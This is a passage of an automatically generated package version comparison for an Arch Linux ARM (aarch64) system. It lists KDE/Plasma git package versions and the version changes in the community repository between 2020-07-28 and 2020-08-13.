                       knewstuff-git                    -5.74.0.r897.g13524772-1
                  knotifications-git                    -5.74.0.r556.g00f8d78-1
                   knotifyconfig-git                    -5.74.0.r296.g1286618-1
                        kpackage-git                    -5.74.0.r592.gb77735b-1
                          kparts-git                    -5.74.0.r427.g130f47a-1
                         kpeople-git                    -5.74.0.r1264.gc94700e-1
                       kplotting-git                    -5.74.0.r241.g6a93a9f-1
                            kpty-git                    -5.74.0.r270.g762a7ab-1
                           kross-git                    -5.74.0.r287.g480a701-1
                         krunner-git                    -5.74.0.r467.gf1f745a-1
                         kscreen-git                    -5.19.80.r1266.g65f342d-2
                   kscreenlocker-git                    -5.19.80.r795.gf53b9b3-2
                        kservice-git                    -5.74.0.r791.g6a43de4-1
                     ksshaskpass-git                    -5.19.80.r172.g01b5517-2
                       ksysguard-git                    -5.19.80.r3341.ga7d1b0d9-1
                     ktexteditor-git                    -5.74.0.r2402.g7f7ba270-1
                    ktextwidgets-git                    -5.74.0.r335.g4527a2d-1
                 kunitconversion-git                    -5.74.0.r316.g1d7c830-1
                         kwallet-git                    -5.74.0.r988.g6462a94-1
                     kwallet-pam-git                    -5.19.80.r224.ge4edda0-2
                        kwayland-git                    -5.74.0.r1021.gb7ae090-1
            kwayland-integration-git                    -5.19.80.r146.g391b552-2
                 kwayland-server-git                    -5.19.80.r1101.g11e6c10-1
                  kwidgetsaddons-git                    -5.74.0.r701.g4d8a6fa-1
                            kwin-git                    -5.19.80.r18223.g2a9971fa0-1
                   kwindowsystem-git                    -5.74.0.r525.gd597633-1
                         kwrited-git                    -5.19.80.r432.g34aaee1-2
                         kxmlgui-git                    -5.74.0.r642.g4b41ac4-1
                   kxmlrpcclient-git                    -5.74.0.r406.g259a34804-1
                      libkscreen-git                    -5.19.80.r1525.g1b78ba2-2
                    libksysguard-git                    -5.19.80.r1935.g6dbd044-1
                       libmm-pp-glib                    -             1.14.0-1
                           milou-git                    -5.19.80.r697.g1cb6012-1
                     modemmanager-pp                    -             1.14.0-1
                 modemmanager-qt-git                    -5.74.0.r465.g13d1462-1
               networkmanager-qt-git                    -5.74.0.r1060.g9276dfc-1
                                 nvm                    -             0.35.3-1
                          oxygen-git                    -5.19.80.r4384.g3cacbed8-1
                    oxygen-icons-git                    -5.74.0.r235.gc77dbd9-1
                oxygen-icons-svg-git                    -5.74.0.r235.gc77dbd9-1
      plasma-browser-integration-git                    -5.19.80.r1125.g3d8f2dfd-1
                  plasma-desktop-git                    -5.19.80.r7802.gb2a8000bb-1
                plasma-framework-git                    -5.74.0.r15518.g3e225d866-1
              plasma-integration-git                    -5.19.80.r474.gba201a7-2
                       plasma-nm-git                    -5.19.80.r2916.g293e1b35-1
                       plasma-pa-git                    -5.19.80.r839.g9ad9330-2
                      plasma-sdk-git                    -5.19.80.r2190.g1fe0dcbb-2
                    plasma-vault-git                    -5.19.80.r291.g4990258-2
        plasma-wayland-protocols-git                    -1.1.1.r1018.g61b389b-1
          plasma-wayland-session-git                    -5.19.80.r9286.gdc70225a7-1
                plasma-workspace-git                    -5.19.80.r9286.gdc70225a7-1
     plasma-workspace-wallpapers-git                    -5.19.80.r216.g1cd0842-2
                polkit-kde-agent-git                    -5.19.80.r450.g1a55d26-2
                      powerdevil-git                    -5.19.80.r2333.g671da448-1
                          prison-git                    -5.74.0.r266.ge32d429-1
                         purpose-git                    -5.74.0.r779.gd7c7837-1
              qqc2-desktop-style-git                    -5.74.0.r380.gad2b24f-1
                    qt5-styleplugins                    -    5.0.0.20170311-23
                        sddm-kcm-git                    -5.19.80.r534.g5f95108-1
                           solid-git                    -5.74.0.r582.gab3ab0f-1
                          sonnet-git                    -5.74.0.r543.ge2fecbc-1
                 spectral-matrix-git                    -  218.r637.gca91709-1
                     syndication-git                    -5.74.0.r778.gf96f120-1
             syntax-highlighting-git                    -5.74.0.r1173.g9c0872d0-1
                  systemsettings-git                    -5.19.80.r2244.g8e14096d-1
                    threadweaver-git                    -5.74.0.r450.gf4d0d40-1
                    user-manager-git                    -5.19.80.r495.gc5daf9f-1
          xdg-desktop-portal-kde-git                    -5.19.80.r295.gc83f7c8-1


:: Different sync package(s) in repository community aarch64

-------------------------------------------------------------------------------
                             PACKAGE           2020-07-28          2020-08-13
-------------------------------------------------------------------------------
                               acorn            1:7.3.1-1            1:7.4.0-1
                           alacritty              0.4.3-1              0.5.0-1
                  appmenu-gtk-module            0.7.3.1-1            0.7.3.2-1
                      arch-wiki-lite           20190826-1           20200527-1
                             argbash              2.8.1-2              2.9.0-1
                          argocd-cli              1.6.1-1              1.6.2-1
                            asciidoc             8.6.10-2              9.0.2-1
                auto-multiple-choice              1.4.0-7              1.4.0-8
                            autopep8            1:1.5.3-1            1:1.5.4-1
                             avr-gcc             10.1.0-1             10.2.0-1
                             awesome                4.3-1                4.3-2
                              awxkit             13.0.0-1             14.0.0-1
                               beets              1.4.9-3              1.4.9-4
                           benchmark              1.5.1-1              1.5.1-2
                             blender          17:2.83.3-3        17:2.83.4-1.1
                               blosc             1.19.0-1             1.20.0-1
                            bonnie++             1.97.3-2               1.98-1
                               botan             2.14.0-1             2.15.0-1
                               broot             0.19.2-1             0.19.4-1
                          browserify             16.5.1-1             16.5.2-1
                               bspwm              0.9.9-2             0.9.10-1
                                btfs               2.21-1               2.22-1
                             buildah             1.15.0-1             1.15.1-1
                             busybox             1.31.1-2             1.31.1-3
                               cacti             1.2.13-1             1.2.14-1
                             calibre             4.21.0-1             4.22.0-1
                      calibre-common             4.21.0-1             4.22.0-1
                     calibre-python3             4.21.0-1             4.22.0-1
                             cargo-c              0.6.9-1             0.6.10-1
                                ccls       0.20190823.6-1       0.20190823.6-2
                             certbot              1.6.0-1              1.7.0-1
                      certbot-apache              1.6.0-1              1.7.0-1
              certbot-dns-cloudflare              1.6.0-1              1.7.0-1
                certbot-dns-cloudxns              1.6.0-1              1.7.0-1
            certbot-dns-digitalocean              1.6.0-1              1.7.0-1
                certbot-dns-dnsimple              1.6.0-1              1.7.0-1
             certbot-dns-dnsmadeeasy              1.6.0-1              1.7.0-1
                  certbot-dns-gehirn              1.6.0-1              1.7.0-1
                  certbot-dns-google              1.6.0-1              1.7.0-1
                  certbot-dns-linode              1.6.0-1              1.7.0-1
                  certbot-dns-luadns              1.6.0-1              1.7.0-1
                   certbot-dns-nsone              1.6.0-1              1.7.0-1
                     certbot-dns-ovh              1.6.0-1              1.7.0-1
                 certbot-dns-rfc2136              1.6.0-1              1.7.0-1
                 certbot-dns-route53              1.6.0-1              1.7.0-1
             certbot-dns-sakuracloud              1.6.0-1              1.7.0-1
                       certbot-nginx              1.6.0-1              1.7.0-1
                                cgdb              0.7.1-2              0.7.1-3
                         chrono-date 2.4.1+134+g9a0ee25-1              3.0.0-2
               cldr-emoji-annotation      37.0.13.0.0.1-1      37.0.13.0.0.2-1
                              cobalt             0.16.0-1             0.16.2-1
                             cockpit                224-1                225-1
                   cockpit-dashboard                224-1                225-1
                      cockpit-docker                224-1                225-1
                    cockpit-machines                224-1                225-1
                         cockpit-pcp                224-1                225-1
                      cockpit-podman                 20-1                 21-1
                              conmon           1:2.0.19-1           1:2.0.20-1
                               copyq             3.11.1-1             3.12.0-1
                             corrade            2019.10-1            2020.06-1
                              coturn            4.5.1.3-1            4.5.1.3-2
                          cozy-stack           1:1.4.14-1           1:1.4.14-2
                               csfml                2.5-3                2.5-4
                          curseofwar              1.2.0-4              1.3.0-1
                                dart              2.8.4-1              2.9.0-1
                             diffpdf            2.1.3.1-2            2.1.3.1-3
                             diffuse0.5.0alpha7+4+g813d6e7-3              0.5.0-1
                 digikam-plugin-gmic              2.9.1-2              2.9.1-3
                         dns-lexicon             3.3.27-1             3.3.28-2
                            dokuwiki         20200609rc-1           20200729-1
                             dovecot           2.3.10.1-1           2.3.10.1-2
                             drumkv1             0.9.15-1             0.9.16-1
                                dune              2.6.1-1              2.6.2-1
                               dunst              1.4.1-1              1.5.0-1
                           duplicity             0.8.12-1             0.8.15-1
                             e-antic              0.1.7-1              0.1.8-1
                            easyjson              0.7.1-2              0.7.3-1
                            ejabberd              20.04-1              20.07-1
                              elixir             1.10.3-1             1.10.4-1
                      emacs-php-mode             1.19.1-4             1.23.0-1
                          emscripten            1.39.20-2             1.40.1-1
                                eric              20.04-1               20.6-1
                         eric-common              20.04-1                    -
                        eric-i18n-de              19.06-1               20.6-1
                        eric-i18n-en              19.06-1               20.6-1
                        eric-i18n-es              19.06-1               20.6-1
                        eric-i18n-ru              19.06-1               20.6-1
                              erlang               23.0-1             23.0.3-1
                          erlang-nox               23.0-1             23.0.3-1
                     erlang-unixodbc               23.0-1             23.0.3-1
                              eslint              7.5.0-1              7.6.0-1
                              faudio              20.07-1              20.08-2
                               faust             2.20.2-5             2.27.2-1
                               fcitx            4.2.9.7-3            4.2.9.8-1
                           fcitx-qt5              1.2.4-5              1.2.5-1
                              fcitx5     0.0.0.20200726-1     0.0.0.20200810-1
                        fcitx5-anthy     0.0.0.20200527-1     0.0.0.20200728-2
                      fcitx5-chewing     0.0.0.20200509-1     0.0.0.20200728-2
               fcitx5-chinese-addons     0.0.0.20200722-1     0.0.0.20200807-1
                          fcitx5-gtk     0.0.0.20200607-2     0.0.0.20200607-3
                       fcitx5-hangul     0.0.0.20200610-1     0.0.0.20200728-2
                          fcitx5-lua     0.0.0.20200405-1     0.0.0.20200802-3
               fcitx5-material-color     0.0.0.20200410-1     0.0.0.20200729-1
                           fcitx5-qt     0.0.0.20200723-1     0.0.0.20200809-1
                          fcitx5-skk     0.0.0.20200523-2     0.0.0.20200523-3
                       fcitx5-unikey     0.0.0.20200527-2     0.0.0.20200527-3
                 firefox-dark-reader             4.9.15-1             4.9.16-1
                      firefox-stylus             1.5.11-1             1.5.13-1
              firefox-tree-style-tab             3.5.13-1             3.5.21-1
                   firefox-tridactyl             1.19.1-1             1.20.0-1
               firefox-ublock-origin             1.28.4-1             1.29.0-1
                               flint              2.6.1-1              2.6.2-1
                             fluxctl             1.19.0-2             1.20.1-1
                                 fop                2.4-1                2.5-1
                             fractal              4.2.2-2              4.4.0-1
                             freeciv              2.6.2-1              2.6.2-2
                           freeimage             3.18.0-6             3.18.0-7
                          freeradius             3.0.21-3             3.0.21-4
                               fwupd              1.4.4-2              1.4.5-1
                                 fzf             0.21.1-2             0.22.0-1
                         gcompris-qt               0.97-1             0.97.1-1
                            gearmand            1.1.18-11            1.1.18-12
                             gendesk              1.0.5-2              1.0.6-1
                         geoipupdate              4.3.0-2              4.3.0-3
                    gimp-plugin-gmic              2.9.1-2              2.9.1-3
                              girara              0.3.4-2              0.3.5-1
                               gitea             1.11.6-2             1.12.3-1
                          github-cli             0.11.0-2             0.11.1-1
                            gitolite             3.6.11-2             3.6.12-1
                               gloox             1.0.23-1             1.0.24-1
                                gmic              2.9.1-2              2.9.1-3
                         gnome-boxes             3.36.5-1             3.36.6-1
                              gnunet             0.13.0-1             0.13.1-1
                                  go           2:1.14.6-1           2:1.14.7-1
                  go-bindata-assetfs              1.0.0-5              1.0.1-1
                         go-ethereum             1.9.17-1             1.9.18-1
                             go-ipfs              0.5.1-1              0.6.0-1
             golang-github-kr-pretty              0.2.0-2              0.2.1-1
                               gpick           0.2.6rc1-7           0.2.6rc1-8
                            gprename           20190221-2           20190221-3
                                gpsd               3.20-1               3.21-1
                              grafx2                2.7-2                2.7-3
                         grammalecte              1.9.0-1             1.11.0-1
                                grim              1.3.0-1              1.3.1-1
                           gscan2pdf              2.8.1-1              2.8.2-1
                               gsoap            2.8.104-1            2.8.105-1
                     gtk-layer-shell              0.1.0-2              0.2.0-1
                                gulp              4.0.2-2              4.0.2-3
                            gvm-libs             10.0.1-2             10.0.2-1
                              hamlib                3.3-7                3.3-8
                             haproxy              2.2.1-1              2.2.2-1
                                haxe              4.0.5-1              4.1.3-1
                             hexchat             2.14.3-2             2.14.3-3
                                 hey              0.1.3-3              0.1.4-1
                           highlight               3.57-1               3.57-2
                       highlight-gui               3.57-1               3.57-2
                             hiredis             0.14.1-1              1.0.0-1
                                hugo             0.73.0-2             0.74.3-1
                            hydrogen           1.0.0rc1-1              1.0.0-1
                             i3-gaps             4.18.2-1             4.18.2-2
                               i3-wm             4.18.1-1             4.18.2-1
                        i3lock-color           2.12.c.4-1           2.12.c.5-1
                      ibus-libpinyin             1.11.1-4             1.11.1-5
                             icecast              2.4.4-1              2.4.4-3
                              icmake            9.02.09-1            9.03.01-1
                             ipython             7.16.1-1             7.17.0-1
                          jack-stdio                1.5-2                1.6-1
                            jacktrip                1.2-1              1.2.1-1
                             jenkins              2.248-1              2.250-1
                                josm              16731-1              16812-1
                    jupyter-notebook              6.0.3-1              6.1.1-1
                          jupyterlab              2.2.0-1              2.2.4-1
                                 k9s             0.21.4-1             0.21.7-1
                             kakoune         2020.01.16-1         2020.08.04-1
                          kcm-fcitx5     0.0.0.20200722-1     0.0.0.20200730-1
                                 kea             1.5.0-13             1.5.0-14
                           keepassxc              2.6.0-1              2.6.0-2
                                khal             0.10.1-3             0.10.2-1
                               kitty             0.18.1-2             0.18.2-2
                      kitty-terminfo             0.18.1-2             0.18.2-2
                   krita-plugin-gmic              2.9.1-2              2.9.1-3
                           kustomize              3.6.1-1              3.8.1-1
                         kvantum-qt5             0.16.0-1             0.16.1-1
                        kyotocabinet             1.2.77-2             1.2.78-1
                             labplot              2.7.0-4              2.7.0-5
                                ldoc              1.4.6-2              1.4.6-3
                           leiningen              2.9.3-1              2.9.4-2
                           leptonica             1.79.0-1             1.80.0-1
                              lhapdf              6.2.3-6              6.3.0-1
                              libasr              1.0.4-1                    -
                            libffado              2.4.3-1              2.4.4-1
                              libime     0.0.0.20200716-1     0.0.0.20200807-1
                        libmaxminddb              1.4.2-1              1.4.3-1
                    libqtshadowsocks              2.1.0-9             2.1.0-10
                        libquicktime             1.2.4-22             1.2.4-23
                 libretro-beetle-psx               2354-1               2360-1
              libretro-beetle-psx-hw               2354-1               2360-1
                  libretro-core-info              1.8.9-1              1.9.0-1
                    libretro-mesen-s                916-1                916-2
                       libretro-mgba               6762-1               6814-1
                       libretro-play               5750-1               5769-1
              libretro-shaders-slang                760-1                765-1
                     libretro-snes9x               1774-1               1776-1
                             librime           1:1.5.3-10           1:1.5.3-11
                           libsigrok              0.5.2-4              0.5.2-5
                           limesuite            20.01.0-3            20.07.0-1
                             liteide               37.1-1               37.2-2
                                lmms              1.2.1-3              1.2.2-1
                            lollypop              1.3.2-1              1.3.3-1
                           lostfiles               4.04-1               4.05-1
                      lua-alt-getopt              0.7.0-8                    -
                        lua-argparse              0.7.0-1              0.7.1-1
                         lua-cqueues           20200603-1           20200726-2
                             lua-dbi              0.7.2-1              0.7.2-2
                           lua-expat              1.3.0-4              1.3.0-5
                      lua-filesystem              1.8.0-1              1.8.0-3
                           lua-mpack              1.0.8-1              1.0.8-3
                        lua-penlight              1.6.0-1              1.6.0-2
                            lua-sdl22.0.5.6.0.r16.g272a748-1          2.0.5.6.0-3
                             lua-sec              2:0.9-1              2:0.9-2
                          lua-socket           20190219-1           20200329-1
                    lua51-alt-getopt              0.7.0-8              0.7.0-9
                      lua51-argparse              0.7.0-1              0.7.1-1
                       lua51-cqueues           20200603-1           20200726-2
                           lua51-dbi              0.7.2-1              0.7.2-2
                         lua51-expat              1.3.0-4              1.3.0-5
                    lua51-filesystem              1.8.0-1              1.8.0-3
                         lua51-mpack              1.0.8-1              1.0.8-3
                           lua51-sec              2:0.9-1              2:0.9-2
                        lua51-socket           20190219-1           20200329-1
                    lua52-alt-getopt              0.7.0-8              0.7.0-9
                      lua52-argparse              0.7.0-1              0.7.1-1
                       lua52-cqueues           20200603-1           20200726-2
                           lua52-dbi              0.7.2-1              0.7.2-2
                         lua52-expat              1.3.0-4              1.3.0-5
                    lua52-filesystem              1.8.0-1              1.8.0-3
                         lua52-mpack              1.0.8-1              1.0.8-3
                           lua52-sec              2:0.9-1              2:0.9-2
                        lua52-socket           20190219-1           20200329-1
                              luakit                2.1-3                2.2-1
                            luarocks              3.3.1-1              3.3.1-2
                                 lxc            1:4.0.3-1            1:4.0.4-1
                               lxcfs              4.0.4-1              4.0.4-2
                                 lxd                4.3-1                4.4-2
                              magnum            2019.10-1            2020.06-1
                      magnum-plugins            2019.10-1            2020.06-1
                             mbedtls             2.16.6-1             2.16.7-1
                         meilisearch             0.12.0-1             0.13.0-1
                          merkaartor             0.18.4-3             0.18.4-4
                            minetest              5.3.0-1              5.3.0-2
                     minetest-common              5.3.0-1              5.3.0-2
                     minetest-server              5.3.0-1              5.3.0-2
                            minikube             1.11.0-2             1.12.2-1
                               minio         2020.05.16-1         2020.08.08-1
                           mitmproxy              5.1.1-1                5.2-1
                          mmdblookup              1.4.2-1              1.4.3-1
                      mongo-c-driver             1.16.2-2             1.17.0-1
                               mruby              2.1.1-1              2.1.2-1
                           mtd-utils              2.1.1-2              2.1.2-1
                           musescore              3.4.2-1                3.5-1
                                musl              1.2.0-1              1.2.1-1
                               navit              0.5.4-1              0.5.4-2
                            neofetch              7.0.0-1              7.1.0-1
                             neomutt           20200626-1           20200626-2
                              neovim              0.4.3-3              0.4.4-1
                             netdata             1.23.2-2             1.24.0-1
             nextcloud-app-bookmarks            1:3.2.5-1            1:3.3.3-1
                nextcloud-app-spreed            1:9.0.2-1            1:9.0.3-1
                 nextcloud-app-tasks             0.13.2-1             0.13.3-1
                       nlohmann-json              3.8.0-2              3.9.1-1
                              nodejs             14.6.0-1             14.7.0-1
                  nodejs-lts-dubnium            10.20.1-2            10.22.0-1
                   nodejs-lts-erbium            12.17.0-1            12.18.3-1
                              nomacs         1:3.16.224-2        1:3.17.2045-1
                            normaliz              3.8.5-2              3.8.7-1
                              notion            1:4.0.1-1            1:4.0.1-2
                             notmuch             0.29.3-2               0.30-1
                        notmuch-mutt             0.29.3-2               0.30-1
                     notmuch-runtime             0.29.3-2               0.30-1
                         notmuch-vim             0.29.3-2               0.30-1
                   npm-check-updates              7.0.2-1              7.0.4-1
                              nsjail                2.9-5                3.0-1
                              octave              5.2.0-4              5.2.0-5
                         opencascade              7.4.0-2            7.4.0.1-1
                 openshadinglanguage            1.10.11-1            1.10.13-1
                           opensmtpd            6.7.1p1-4            6.7.1p1-5
                             openttd             1.10.2-1             1.10.3-1
                                osmo              0.4.2-4              0.4.4-1
                              oxipng              3.0.0-1              3.0.1-1
                              packer              1.6.0-2              1.6.1-1
                             padthv1             0.9.15-1             0.9.16-1
                            pageedit              1.2.0-2              1.3.0-1
                  papirus-icon-theme           20200702-1           20200801-1
                             pcbdraw              0.4.0-2              0.6.0-1
                                 pcp              5.1.1-2              5.2.0-1
                          pcsc-tools              1.5.6-1              1.5.7-1
                              pd-lua                0.9-2             0.10.1-1
                            pdf2djvu             0.9.17-4           0.9.17.1-1
                         pdfarranger              1.6.0-2              1.6.2-1
                               pdfpc              4.4.0-1              4.4.0-2
                               peony              2.2.0-2              3.0.1-1
                             perl-gd               2.71-3               2.72-1
                perl-module-scandeps               1.27-3               1.28-1
                 perl-ppix-quotelike              0.011-2              0.012-1
                    perl-ppix-regexp              0.072-2              0.073-1
                     perl-test-fatal              0.014-6              0.016-1
                    perl-test-simple           1.302175-2           1.302177-1
                    perl-test2-suite           0.000130-2           0.000132-1
                      perl-type-tiny           1.004002-3           1.010002-1
                        php-igbinary              3.1.2-1              3.1.4-1
                         php-mongodb              1.7.5-1              1.8.0-1
                               picom                  8-2                  8-3
                              pifpaf              2.5.0-1              2.6.0-1
                               pinfo             0.6.10-9             0.6.13-1
     plasma5-applets-thermal-monitor              1.2.9-3              1.3.0-1
                           playerctl              2.1.1-1              2.2.1-1
                              podman              2.0.3-1              2.0.4-1
                       podman-docker              2.0.3-1              2.0.4-1
                              podofo              0.9.6-2              0.9.6-3
                        polyclipping              6.4.2-3              6.4.2-4
                              polyml                5.8-2              5.8.1-1
                             postfwd               2.02-2               2.03-1
                                ptex              2.3.2-1              2.3.2-2
                              pylama              7.7.1-3              7.7.1-4
                         python-acme              1.6.0-1              1.7.0-1
                         python-amqp              2.6.0-1              2.6.1-1
                        python-arrow             0.15.7-1             0.15.8-1
                     python-atpublic                1.0-1                2.0-1
                      python-awkward            0.12.22-1             0.13.0-1
                    python-braintree              4.2.0-1              4.3.0-1
                       python-celery              4.4.6-1              4.4.7-1
                         python-cfgv              3.1.0-2              3.2.0-1
                     python-cfn-lint             0.34.0-1             0.34.1-1
                       python-cftime              1.1.3-1              1.2.1-1
                        python-cliff              3.3.0-1              3.4.0-1
                   python-cloudflare              2.8.6-1              2.8.9-1
                         python-cmd2              1.1.0-1              1.3.2-1
                     python-curtsies              0.3.1-2              0.3.4-1
                python-debtcollector              2.1.0-1              2.2.0-1
              python-designateclient              4.0.0-1              4.1.0-1
            python-django-extensions              3.0.3-1              3.0.4-1
        python-django-rest-framework             3.11.0-3             3.11.1-1
                         python-dkim              1.0.4-1              1.0.5-1
                       python-docker              4.2.2-1              4.3.0-1
                python-dogpile.cache              0.9.2-1              1.0.2-1
                      python-dropbox             10.2.0-1             10.3.0-1
                python-elasticsearch              7.8.0-1              7.8.1-1
                      python-etesync             0.11.1-2             0.12.0-1
                     python-eventlet             0.25.2-1             0.26.1-1
                     python-flasgger              0.9.4-2              0.9.5-1
             python-flask-sqlalchemy              2.4.3-1              2.4.4-1
                   python-flufl.i18n                3.0-1              3.0.1-1
                        python-gammu                3.0-1                3.1-1
                       python-geoip2              3.0.0-1              4.0.2-1
                        python-gmpy2            2.1.0b4-1            2.1.0b5-1
              python-google-api-core             1.20.0-1             1.22.0-1
     python-google-api-python-client              1.9.3-1             1.10.0-1
                  python-google-auth             1.19.2-1             1.20.1-1
                      python-helpdev             0.6.10-1              0.7.1-1
                   python-hypothesis             5.22.0-1             5.24.0-1
                 python-intervaltree              3.0.2-2              3.1.0-1
                         python-jose              3.1.0-1              3.2.0-1
                python-keystoneauth1              4.2.0-1              4.2.1-1
                        python-ldap3                2.7-2                2.8-1
                       python-libcst              0.3.8-1              0.3.9-1
                         python-lupa                1.9-1                1.9-2
                 python-magnumclient              3.1.0-1              3.2.0-1
                        python-mamba             0.11.0-1             0.11.1-1
                    python-maxminddb              1.5.4-1              2.0.2-1
                    python-mongomock             3.19.0-2             3.20.0-1
                          python-mss              5.0.0-1              6.0.0-1
                      python-mutagen             1.45.0-1             1.45.1-1
                python-mypy-protobuf               1.20-1               1.23-1
                  python-mysqlclient              2.0.0-1              2.0.1-1
                      python-netcdf4              1.5.3-3              1.5.4-1
              python-netcdf4-openmpi              1.4.2-1              1.5.4-1
       python-openapi-spec-validator              0.2.8-3              0.2.9-1
                     python-openmdao              3.1.1-1              3.2.1-1
                  python-oslo-config              8.3.0-1              8.3.1-1
                   python-oslo-utils              4.3.0-1              4.4.0-1
                       python-pandas              1.0.5-1              1.1.0-1
                        python-parso              0.7.0-1              0.8.0-1
                     python-pdfminer           20200517-1           20200726-1
                       python-pg8000             1.16.3-1             1.16.5-1
                    python-pip-shims              0.5.2-1              0.5.3-1
                     python-prawcore              1.4.0-1              1.5.0-1
                python-process-tests              2.0.2-3              2.1.1-1
               python-prompt_toolkit              3.0.5-1              3.0.6-1
                       python-psutil              5.7.0-1              5.7.2-1
                   python-py-cpuinfo              6.0.0-1              7.0.0-1
                     python-pygithub               1.51-1               1.52-1
                      python-pymongo             3.10.1-2             3.11.0-1
                   python-pynormaliz               2.11-1               2.12-1
                 python-pyscreenshot                1.0-1                2.2-1
                       python-pytest              5.4.3-1              6.0.1-1
                python-pytest-forked              1.2.0-1              1.3.0-1
                 python-pytest-xdist             1.33.0-1             1.34.0-1
                  python-pytest-xvfb              1.2.0-1              2.0.0-1
             python-pyvirtualdisplay              0.2.5-1              1.3.2-1
                        python-qiniu              7.2.8-1              7.2.9-1
                    python-reportlab             3.5.46-1             3.5.47-1
                python-requests-file              1.4.3-5              1.5.1-1
                       python-schema              0.7.2-1              0.7.3-1
                    python-soupsieve              1.9.6-1              2.0.1-1
                       python-sphinx              3.1.2-1              3.2.0-1
               python-spyder-kernels              1.9.1-1              1.9.3-1
                    python-starlette             0.13.6-1             0.13.7-1
                        python-sybil              1.3.0-1              1.4.0-1
                        python-sympy              1.6.1-1              1.6.2-1
                        python-tblib              1.6.0-1              1.7.0-1
                      python-testflo              1.4.2-1              1.4.2-2
                   python-tldextract              2.2.2-1              2.2.3-1
                      python-tomlkit              0.6.0-1              0.7.0-1
                          python-tox             3.18.0-1             3.19.0-1
                         python-tqdm             4.48.0-1             4.48.2-1
                    python-typeguard              2.7.1-1              2.8.0-1
                    python-u-msgpack              2.6.0-1              2.7.0-1
                        python-ujson              3.0.0-1              3.1.0-1
               python-update-checker               0.17-1             0.18.0-1
                   python-urwidtrees              1.0.2-5              1.0.3-2
                   python-validators             0.15.0-1             0.16.0-1
                        python-vcrpy              4.0.2-1              4.1.0-1
                   python-whitenoise              5.1.0-1              5.2.0-1
                       python-xarray             0.15.1-1             0.16.0-2
                   python-xlsxwriter              1.2.9-1              1.3.2-1
                       python-xxhash              1.4.4-1              2.0.0-1
                         python-yarl              1.4.2-1              1.5.1-1
                       python-yaspin             0.18.0-1              1.0.0-1
                    python2-autopep8            1:1.5.3-1            1:1.5.4-1
             python2-netcdf4-openmpi              1.4.2-1                    -
               python2-process-tests              2.0.2-3              2.1.1-1
                      python2-psutil              5.7.0-1              5.7.2-1
               python2-pytest-forked              1.2.0-1              1.3.0-1
                python2-pytest-xdist             1.33.0-1             1.34.0-1
                   python2-soupsieve              1.9.6-1              1.9.6-2
                         python2-tox             3.18.0-1             3.19.0-1
                   python2-u-msgpack              2.6.0-1              2.7.0-1
                                qcad           3.24.3.4-1          3.24.3.10-2
                                qgis             3.12.3-2             3.14.1-1
                            qjackctl              0.6.2-1              0.6.3-1
                            qmidictl              0.6.2-1              0.6.3-1
                            qmidinet              0.6.2-1              0.6.3-1
                                qmmp              1.4.0-1              1.4.1-1
                         qpid-proton             0.30.0-3             0.31.0-1
                              qsynth              0.6.2-1              0.6.3-1
                            qtractor             0.9.15-1             0.9.16-1
                               qvkbd        git20170102-2        git20170102-3
                             qxgedit              0.6.2-1              0.6.3-1
                            range-v3             0.10.0-1             0.11.0-1
                        rdiff-backup              2.0.3-1              2.0.5-1
                              remake       4.2.1+dbg1.4-3         4.3+dbg1.5-1
                            restinio              0.6.8-1            0.6.8.1-1
                           retroarch              1.8.9-1              1.9.0-1
              retroarch-assets-ozone              1:325-1              1:327-1
                retroarch-assets-xmb              1:325-1              1:327-1
                                 rox               2.11-4               2.11-6
                           rpm-tools             4.15.1-2             4.15.1-3
                                runc          1.0.0rc91-1          1.0.0rc92-1
                       rust-analyzer           20200720-1           20200810-1
                        rust-bindgen             0.54.0-2             0.54.1-1
                           s3fs-fuse               1.86-1               1.87-1
                             samplv1             0.9.15-1             0.9.16-1
                         sc3-plugins             3.10.0-3             3.10.0-4
                              scrapy              2.2.1-1              2.3.0-1
                           screenkey                1.1-2                1.2-1
                               sfizz              0.3.2-1              0.4.0-1
                           shorewall            5.2.6.1-1              5.2.7-1
                      shorewall-core            5.2.6.1-1              5.2.7-1
                          shorewall6            5.2.6.1-1              5.2.7-1
                               sigal                2.1-1              2.1.1-1
                               sigil              1.2.1-2              1.3.0-1
                              skopeo              1.1.0-1              1.1.1-1
                             skrooge             2.22.1-1             2.23.0-1
                                 snd               20.5-1               20.6-1
                              solaar              1.0.2-1              1.0.3-1
                            sonic-pi              3.2.2-1              3.2.2-2
                               sopel              7.0.4-1              7.0.6-1
                              spdlog              1.7.0-1              1.7.0-2
                              spyder              4.1.3-2              4.1.4-1
                         staticcheck           2020.1.4-1           2020.1.5-1
                                 stk              4.6.1-2              4.6.1-3
                         sweethome3d                6.3-1                6.4-1
           switchboard-plug-keyboard              2.3.6-1              2.4.0-1
                               sxhkd              0.6.1-2              0.6.2-1
                             synthv1             0.9.15-1             0.9.16-1
                         tap-plugins              1.0.0-4              1.0.1-1
                    telegram-desktop              2.2.0-1              2.2.0-2
                           terraform            0.12.28-1            0.12.29-1
         terraform-provider-keycloak             1.19.0-1             1.20.0-1
                           tesseract              4.1.1-2              4.1.1-3
                            texworks              0.6.5-2              0.6.5-3
                            three.js               r118-1               r119-1
                               tiled              1.4.1-2              1.4.2-1
                               tmuxp              1.5.4-1              1.5.5-1
                                 tor            0.4.3.5-2            0.4.3.6-1
                             traefik              2.2.1-2              2.2.2-1
              ubuntukylin-wallpapers            20.04.1-1                    -
                           uglify-js             3.10.0-1             3.10.1-1
                 ukui-control-center              2.0.5-1              3.0.0-1
                        ukui-greeter              1.2.6-1              3.0.0-1
                          ukui-media              2.0.4-1              3.0.0-1
                          ukui-panel              2.0.7-1              3.0.1-1
                ukui-session-manager              2.0.3-1              3.0.0-1
                        ukui-sidebar              1.1.2-1              3.0.0-1
                             unbound             1.10.1-2             1.11.0-2
                                 urh              2.8.8-1              2.8.8-2
                            urlwatch               2.19-1               2.21-1
                               v2ray             4.26.0-1             4.27.0-1
         v2ray-domain-list-community     20200725163800-1     20200810224036-1
                         v2ray-geoip       202007220003-1       202008050004-1
                         vapoursynth                R50-1                R51-1
          vapoursynth-plugin-deblock                  6-2                6.1-1
                             vicious              2.3.3-1              2.4.1-2
                              viking                1.8-3                1.8-4
                        vim-nerdtree              6.9.0-1              6.9.4-1
                                 vis                0.6-1                0.6-2
                                wabt             1.0.17-1             1.0.19-1
                              waybar              0.9.2-3              0.9.3-3
                             weechat                2.9-1                2.9-2
      wingpanel-indicator-nightlight              2.0.3-1              2.0.4-1
           wingpanel-indicator-sound              2.1.5-1              2.1.6-1
                                wofi              1.1.2-2              1.2.1-1
                         x42-plugins           20200714-2           20200714-3
                                xaos                4.0-1                4.1-1
                          xcb-imdkit     0.0.0.20200607-1     0.0.0.20200808-1
